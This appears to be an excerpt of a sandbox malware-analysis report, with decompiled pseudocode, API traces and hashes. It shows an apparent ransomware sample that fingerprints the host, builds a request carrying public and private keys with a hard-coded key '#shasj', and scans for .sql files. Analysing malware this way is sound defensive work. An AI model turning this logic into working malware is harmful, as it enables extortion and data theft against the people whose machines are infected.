• Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 79308fede0dd34f7c785c521a96fb6aa572d869fe66738e1eea17ab525b50520
                                        • Instruction ID: 2dde35d49bffbb49bbc6d1cf7c7ad688f88bf9823c385c9e0f5936e06ac3d16e
                                        • Opcode Fuzzy Hash: 79308fede0dd34f7c785c521a96fb6aa572d869fe66738e1eea17ab525b50520
                                        • Instruction Fuzzy Hash: A0211F30240B04AEE7762A25DD0AFA6B2E5BB40B45F758828F2C1245F18BF57499DF08
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 100%
			// Registry read helper: opens key _a8 under root _a4, reads value _a12 into
			// the _a16 buffer (_a20 bytes available) and returns 1 on success, 0 on failure.
			// The APIs section below shows it being used for
			// HARDWARE\DESCRIPTION\System\CentralProcessor\0 \ ProcessorNameString.
			E0F9D72B0(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;
				int _t11;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed; 0x20019 == KEY_READ
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20; // the _a8 slot is reused as the in/out buffer-size argument
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError(); // result is discarded
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}


                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,0000060C,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72C6
                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000080,?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72E7
                                        • RegCloseKey.KERNELBASE(?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72F7
                                        • GetLastError.KERNEL32(?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D7306
                                        • RegCloseKey.ADVAPI32(?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D730F
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
• Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$ErrorLastOpenQueryValue
                                        • String ID:
                                        • API String ID: 2437438455-0
                                        • Opcode ID: af505a80bcd8e54166c52c55d3e20a9edc2653fe9ba8d75e764162b63f563ba6
                                        • Instruction ID: 94ab027d20f8a07a38f8fb476f74b7d571647572b9bf46a2f79076786ac883c3
                                        • Opcode Fuzzy Hash: af505a80bcd8e54166c52c55d3e20a9edc2653fe9ba8d75e764162b63f563ba6
                                        • Instruction Fuzzy Hash: BE011A3260511DEBDB119F94ED09D9ABB6CEB09362B108166FD05D6111D7329A34AFE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 219 f9d4bf0-f9d4c29 CreateThread 221 f9d4c2b-f9d4c2f FindCloseChangeNotification 219->221 222 f9d4c35-f9d4c3b 219->222 221->222
                                        C-Code - Quality: 100%
			// Entry point: starts the worker thread E0F9D4950 and returns 1. The thread
			// handle is closed immediately, which does not stop the thread; the export
			// FindCloseChangeNotification resolves to the same code as CloseHandle, which
			// is why the decompiler labels the call this way.
			_entry_(intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t10;

				_v16 = 1;     // return value, always 1
				_v12 = _a8;   // stored but not used further in this function
				_t10 = CreateThread(0, 0, E0F9D4950, 0, 0, 0); // executed
				_v8 = _t10;
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed; effectively CloseHandle
				}
				return _v16;
			}


                                        APIs
                                        • CreateThread.KERNELBASE ref: 0F9D4C1C
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0F9D4C2F
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
• Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ChangeCloseCreateFindNotificationThread
                                        • String ID:
                                        • API String ID: 4060959955-0
                                        • Opcode ID: 48cb12911a711d1e0ae6269b98b08b4a26e368db564743880a3633a6e7b456da
                                        • Instruction ID: 70925dfa41bdb85fd63494aa49d68d5455b6cc1a7395b84163fd23db5c34ad49
                                        • Opcode Fuzzy Hash: 48cb12911a711d1e0ae6269b98b08b4a26e368db564743880a3633a6e7b456da
                                        • Instruction Fuzzy Hash: 16F03934A48308FBE720DFA4D90AB8CB774EB04705F30809AFA016B2C1D6B56690CB48
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 228 f9d5880-f9d590c call f9d39f0 call f9d7330 call f9d7140 VirtualAlloc 235 f9d590e-f9d5910 228->235 236 f9d5921-f9d5925 228->236 235->236 237 f9d5912-f9d591f 235->237 238 f9d5927-f9d5936 236->238 237->238 239 f9d594f-f9d5951 238->239 240 f9d5938-f9d593d 238->240 242 f9d5955-f9d595e 239->242 240->239 241 f9d593f-f9d594d 240->241 241->242 243 f9d596d-f9d596f 242->243 244 f9d5960-f9d596b 242->244 245 f9d5973-f9d5975 243->245 244->243 244->245 246 f9d597b-f9d59f8 CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 245->246 247 f9d5d44 245->247 248 f9d5a0f 246->248 249 f9d59fa-f9d59fc 246->249 250 f9d5d4a 247->250 252 f9d5a17-f9d5a20 lstrlenA 248->252 249->248 251 f9d59fe-f9d5a0d 249->251 253 f9d5d4f-f9d5d6d VirtualFree call f9d7c10 250->253 251->252 254 f9d5a2a 252->254 255 f9d5a22-f9d5a28 252->255 257 f9d5a32-f9d5a3c lstrlenA 254->257 255->254 255->257 259 f9d5a3e-f9d5a4a 257->259 260 f9d5a72-f9d5a79 lstrlenA 257->260 263 f9d5a50-f9d5a55 259->263 261 f9d5a7b-f9d5a7f 260->261 262 f9d5aa1-f9d5b68 lstrcatW lstrlenW call f9d6f40 lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 260->262 264 f9d5a83-f9d5a88 261->264 274 f9d5b6a-f9d5b6c 262->274 275 f9d5b74-f9d5b76 262->275 266 f9d5a57-f9d5a59 263->266 267 f9d5a62-f9d5a6c lstrlenA 263->267 268 f9d5a8a-f9d5a8c 264->268 269 f9d5a95-f9d5a9f lstrlenA 264->269 266->267 271 f9d5a5b-f9d5a5e 266->271 267->263 272 f9d5a6e 267->272 268->269 273 f9d5a8e-f9d5a91 268->273 269->262 269->264 271->267 272->260 273->269 274->275 276 f9d5b6e-f9d5b72 274->276 277 f9d5b7a-f9d5c2e lstrlenW call f9d9010 lstrlenA call f9d5d70 call f9d5e20 CryptBinaryToStringA 275->277 276->277 284 f9d5c36-f9d5c5c lstrlenA VirtualAlloc lstrlenA 277->284 285 f9d5c30 GetLastError 277->285 286 f9d5c5e-f9d5c64 284->286 287 f9d5c66 284->287 285->284 286->287 288 f9d5c6e-f9d5c75 lstrlenA 286->288 287->288 289 
f9d5c9e-f9d5cd4 lstrlenA MultiByteToWideChar call f9d54a0 288->289 290 f9d5c77-f9d5c7f 288->290 296 f9d5d07-f9d5d0d 289->296 297 f9d5cd6-f9d5d05 VirtualFree * 3 289->297 291 f9d5c80-f9d5c85 290->291 293 f9d5c87-f9d5c89 291->293 294 f9d5c92-f9d5c9c lstrlenA 291->294 293->294 298 f9d5c8b-f9d5c8e 293->298 294->289 294->291 299 f9d5d0f-f9d5d12 296->299 300 f9d5d14-f9d5d42 VirtualFree * 3 296->300 297->253 298->294 299->300 300->250
                                        C-Code - Quality: 78%
                                        			E0F9D5880(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
                                        				char _v295;
                                        				char _v296;
                                        				char _v404;
                                        				char _v408;
                                        				void* _v428;
                                        				CHAR* _v432;
                                        				int _v436;
                                        				int _v440;
                                        				char _v442;
                                        				CHAR* _v444;
                                        				short _v448;
                                        				int _v452;
                                        				char _v456;
                                        				CHAR* _v464;
                                        				int _v468;
                                        				void* _v472;
                                        				BYTE* _v476;
                                        				WCHAR* _v480;
                                        				WCHAR* _v484;
                                        				void* _v488;
                                        				void* _v492;
                                        				short* _v496;
                                        				CHAR* _v500;
                                        				void* _v504;
                                        				long _v508;
                                        				CHAR* _v512;
                                        				CHAR* _v528;
                                        				CHAR* _t133;
                                        				void* _t135;
                                        				int _t145;
                                        				void* _t148;
                                        				int _t149;
                                        				void* _t150;
                                        				void* _t152;
                                        				signed int _t159;
                                        				signed int _t163;
                                        				void* _t170;
                                        				signed int _t172;
                                        				CHAR* _t185;
                                        				long _t189;
                                        				intOrPtr _t199;
                                        				int _t200;
                                        				void _t202;
                                        				int _t203;
                                        				void _t204;
                                        				int _t205;
                                        				long _t213;
                                        				void* _t219;
                                        				short _t228;
                                        				char* _t229;
                                        				WCHAR* _t231;
                                        				short _t233;
                                        				CHAR* _t234;
                                        				char _t235;
                                        				void* _t238;
                                        				long _t240;
                                        				long _t241;
                                        				void* _t243;
                                        				void* _t245;
                                        				short _t248;
                                        				int _t249;
                                        				void* _t255;
                                        				CHAR* _t256;
                                        				WCHAR* _t258;
                                        				WCHAR* _t259;
                                        				signed int _t261;
                                        				CHAR* _t262;
                                        				CHAR* _t263;
                                        				signed int _t266;
                                        				int _t267;
                                        				void* _t268;
                                        				long _t271;
                                        				void* _t272;
                                        				void* _t273;
                                        				long _t279;
                                        				int _t280;
                                        				long _t281;
                                        				void* _t282;
                                        				CHAR* _t283;
                                        				short _t284;
                                        
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_v456 = __ecx;
                                        				_v436 = __edx;
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				E0F9D39F0( &_v404);
                                        				E0F9D7330( &_v492, __edx);
                                        				_t255 = E0F9D7140( &_v492);
                                        				_t266 = _a8 + __edx;
                                        				_t7 = _t266 + 8; // 0x8
                                        				_t213 = _t255 + _t7 * 8 << 3;
                                        				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
                                        				_t248 = 0;
                                        				_v512 = _t133;
                                        				_v528 = _t133;
                                        				_t228 = 0x30 + (_t255 + _t266 * 4) * 8;
                                        				if(_t133 == 0 || _t228 >= _t213) {
                                        					_v448 = _t248;
                                        					_t256 = _t133;
                                        				} else {
                                        					_t256 =  &(_t133[_t228]);
                                        					_v448 = _t133;
                                        					_v444 = _t256;
                                        					_t248 = _t228;
                                        				}
                                        				_t135 = 2 + _a8 * 8;
                                        				if(_v428 == 0) {
                                        					L7:
                                        					_t229 = 0;
                                        					_v432 = 0;
                                        				} else {
                                        					_t284 = _t248 + _t135;
                                        					if(_t284 >= _t213) {
                                        						goto L7;
                                        					} else {
                                        						_t229 = _t256;
                                        						_v432 = _t256;
                                        						_t256 =  &(_t256[_t135]);
                                        						_t248 = _t284;
                                        						_v444 = _t256;
                                        					}
                                        				}
                                        				_t267 = _v440;
                                        				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
                                        					_t256 = 0;
                                        					_v444 = 0;
                                        				}
                                        				if(_t229 == 0) {
                                        					goto L53;
                                        				} else {
                                        					_t249 = _a8;
                                        					_v436 = _t249 + _t249;
                                        					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
                                        					_v452 = _t267 + _t267;
                                        					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
                                        					_t145 = lstrlenA(_t256);
                                        					_t271 = _t145 + lstrlenA(_v464) + 0x42;
                                        					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
                                        					_v472 = _t148;
                                        					_v488 = _t148;
                                        					_v492 = 0;
                                        					_t149 = lstrlenA(_v464);
                                        					_t231 = _v472;
                                        					_t150 = _t149 + 1;
                                        					if(_t231 == 0 || _t150 >= _t271) {
                                        						_v484 = 0;
                                        					} else {
                                        						_v492 = _t150;
                                        						_v488 = _t231 + _t150;
                                        						_v484 = _t231;
                                        					}
                                        					_t152 = lstrlenA(_t256) + 1;
                                        					if(_v472 == 0 || _t152 + _v492 >= _t271) {
                                        						_v488 = 0;
                                        					}
                                        					_t272 = 0;
                                        					if(lstrlenA(_v464) != 0) {
                                        						_t245 = _v484;
                                        						_t263 = _v464;
                                        						_v492 = _t245;
                                        						do {
                                        							_t204 =  *((intOrPtr*)(_t272 + _t263));
                                        							if(_t204 != 0xa && _t204 != 0xd) {
                                        								 *_t245 = _t204;
                                        								_v492 = _t245 + 1;
                                        							}
                                        							_t272 = _t272 + 1;
                                        							_t205 = lstrlenA(_t263);
                                        							_t245 = _v492;
                                        						} while (_t272 < _t205);
                                        						_t256 = _v476;
                                        					}
                                        					_t273 = 0;
                                        					if(lstrlenA(_t256) != 0) {
                                        						_t243 = _v488;
                                        						_v492 = _t243;
                                        						do {
                                        							_t202 =  *((intOrPtr*)(_t273 + _t256));
                                        							if(_t202 != 0xa && _t202 != 0xd) {
                                        								 *_t243 = _t202;
                                        								_v492 = _t243 + 1;
                                        							}
                                        							_t273 = _t273 + 1;
                                        							_t203 = lstrlenA(_t256);
                                        							_t243 = _v492;
                                        						} while (_t273 < _t203);
                                        					}
                                        					_t258 = _v480;
                                        					lstrcatW(_t258, L"action=call&");
                                        					_t259 =  &(_t258[lstrlenW(_t258)]);
                                        					E0F9D6F40( &_v440, _t259);
                                        					lstrcatW(_t259, L"&pub_key=");
                                        					_t159 = lstrlenW(_t259);
                                        					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
                                        					lstrcatW(_t259, L"&priv_key=");
                                        					_t163 = lstrlenW(_t259);
                                        					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
                                        					lstrcatW(_t259, L"&version=2.3r");
                                        					_t279 = (lstrlenW(_v484) << 4) + 0x12;
                                        					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
                                        					_v480 = _t219;
                                        					_t170 = 2 + lstrlenW(_v484) * 8;
                                        					if(_t219 == 0 || _t170 >= _t279) {
                                        						_v492 = 0;
                                        					} else {
                                        						_v492 = _t219;
                                        					}
                                        					_t172 = lstrlenW(_v480);
                                        					_t233 = "#shasj"; // 0x61687323
                                        					_t261 = _t172;
                                        					asm("movq xmm0, [0xf9dfc78]");
                                        					_v448 = _t233;
                                        					_t234 =  *0xf9dfc84; // 0x6a73
                                        					_v444 = _t234;
                                        					_t235 =  *0xf9dfc86; // 0x0
                                        					asm("movq [esp+0x3c], xmm0");
                                        					_v442 = _t235;
                                        					_v296 = 0;
                                        					E0F9D9010( &_v295, 0, 0xff);
                                        					E0F9D5D70( &_v296,  &_v456, lstrlenA( &_v456));
                                        					_t280 = _t261 + _t261;
                                        					E0F9D5E20( &_v296, _v480, _t280);
                                        					_t262 = _v492;
                                        					_v468 = _t261 * 8;
                                        					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
                                        						GetLastError();
                                        					}
                                        					_t105 = lstrlenA(_t262) + 2; // 0x2
                                        					_t281 = _t105;
                                        					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
                                        					_t107 = lstrlenA(_t262) + 1; // 0x1
                                        					_t238 = _t107;
                                        					_t185 = _v504;
                                        					if(_t185 == 0) {
                                        						L40:
                                        						_v500 = 0;
                                        					} else {
                                        						_v500 = _t185;
                                        						if(_t238 >= _t281) {
                                        							goto L40;
                                        						}
                                        					}
                                        					_t282 = 0;
                                        					if(lstrlenA(_t262) != 0) {
                                        						_t241 = _v500;
                                        						_v508 = _t241;
                                        						do {
                                        							_t199 =  *((intOrPtr*)(_t282 + _t262));
                                        							if(_t199 != 0xa && _t199 != 0xd) {
                                        								 *_t241 = _t199;
                                        								_v508 = _t241 + 1;
                                        							}
                                        							_t282 = _t282 + 1;
                                        							_t200 = lstrlenA(_t262);
                                        							_t241 = _v508;
                                        						} while (_t282 < _t200);
                                        					}
                                        					_t283 = _v500;
                                        					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
                                        					_v508 = 0;
                                        					_t189 = E0F9D54A0(_t283,  &_v508, 1);
                                        					if(_t189 != 0) {
                                        						_t240 = _v508;
                                        						if(_t240 != 0) {
                                        							 *_a12 = _t240;
                                        						}
                                        						VirtualFree(_v504, 0, 0x8000);
                                        						VirtualFree(_v492, 0, 0x8000);
                                        						VirtualFree(_v488, 0, 0x8000);
                                        						L53:
                                        						_t268 = 1;
                                        					} else {
                                        						VirtualFree(_v504, _t189, 0x8000);
                                        						VirtualFree(_v492, 0, 0x8000);
                                        						VirtualFree(_v488, 0, 0x8000);
                                        						_t268 = 0;
                                        					}
                                        				}
                                        				VirtualFree(_v428, 0, 0x8000);
                                        				E0F9D7C10( &_v408);
                                        				return _t268;
                                        			}



















































































Instruction addresses of the decompiled lines above, in order, range from 0x0f9d588f to 0x0f9d5d6d (entries of 0x00000000 mark synthesized lines with no address). The per-line alignment of this column was lost in extraction.

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F9D58F0
                                        • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F9D599A
                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F9D59B3
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D59BC
                                        • lstrlenA.KERNEL32(?), ref: 0F9D59C4
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F9D59D5
                                        • lstrlenA.KERNEL32(?), ref: 0F9D59EF
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A18
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5A38
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5A64
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A75
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A97
                                        • lstrcatW.KERNEL32(?,action=call&), ref: 0F9D5AB1
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5ABA
                                        • lstrcatW.KERNEL32(?,&pub_key=), ref: 0F9D5ACF
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5AD2
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5ADB
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 0F9D5AF0
                                        • lstrcatW.KERNEL32(?,&priv_key=), ref: 0F9D5AFC
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5AFF
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5B0C
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 0F9D5B21
                                        • lstrcatW.KERNEL32(?,&version=2.3r), ref: 0F9D5B2D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B39
                                        • VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 0F9D5B4D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B5D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B7E
                                        • _memset.LIBCMT ref: 0F9D5BC7
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5BDA
                                          • Part of subcall function 0F9D5D70: _memset.LIBCMT ref: 0F9D5D9D
                                        • CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 0F9D5C26
                                        • GetLastError.KERNEL32 ref: 0F9D5C30
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C37
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0F9D5C46
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C51
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C71
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C94
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5CA3
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 0F9D5CB4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5CE7
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5CF4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D01
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D26
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D33
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D40
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
                                        • String ID: #shasj$&priv_key=$&pub_key=$&version=2.3r$action=call&
                                        • API String ID: 2781787645-472827701
                                        • Opcode ID: 255cd6b7fce2ff359efd85a661351dd3fbec36fc6ca318337ea6fb5f227a63c6
                                        • Instruction ID: 0e4f7796f0be8b74af80200d39dc9013b07669d75eeaa73f59306592892bc88a
                                        • Opcode Fuzzy Hash: 255cd6b7fce2ff359efd85a661351dd3fbec36fc6ca318337ea6fb5f227a63c6
                                        • Instruction Fuzzy Hash: 6DE1EE71108302AFE720DF24CC84B6BBBE9EF88754F24891CF585A7291D774E915CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                         			/* Directory scan for ".sql" files, written as a do/while over FindFirstFileW/FindNextFileW.
                                         			   The buffer in ECX is appended to in place ("*" for the search, then each cFileName), so the
                                         			   caller must pass a directory prefix that ends in a path separator and has room to spare.
                                         			   For every entry whose text after the last '.' of the full path is exactly L".sql" (lstrcmpW,
                                         			   case-sensitive, so "x.SQL" and "x.sql.bak" are skipped) the file is opened read-only, read whole
                                         			   if it is smaller than 0x40000000 (1 GiB) and searched for the 19-asterisk marker (E0F9D8100).
                                         			   The search result is used only as a yes/no: the parser E0F9D69E0 is then called on
                                         			   buf + 1 + lstrlenA(marker) = buf + 20, a fixed offset, so the marker is effectively expected
                                         			   to begin the file. The first non-zero parser result stops the enumeration and is returned;
                                         			   otherwise the function returns 0. Left column: instruction address of each line. */
                                                   			E0F9D6A40(WCHAR* __ecx) {
                                                   				void* _v8;
                                                   				void* _v12;
                                                   				WCHAR* _v16;
                                                   				WCHAR* _v20;
                                                   				long _v24;
                                                   				struct _WIN32_FIND_DATAW _v620;
                                                   				int _t38;
                                                   				struct _SECURITY_ATTRIBUTES* _t40;
                                                   				int _t50;
                                                   				WCHAR* _t52;
                                                   				intOrPtr _t53;
                                                   				void* _t54;
                                                   				WCHAR* _t57;
                                                   				long _t64;
                                                   				WCHAR* _t66;
                                                   				void* _t67;
                                         
                                         0f9d6a4b  				_t66 = __ecx;
                                         0f9d6a4f  				_v16 = __ecx;
                                         0f9d6a5e  				_t52 =  &(_t66[lstrlenW(__ecx)]);   /* _t52: end of the caller's prefix, restored at L19 */
                                         0f9d6a61  				_v20 = _t52;
                                         0f9d6a64  				lstrcatW(_t66, "*");
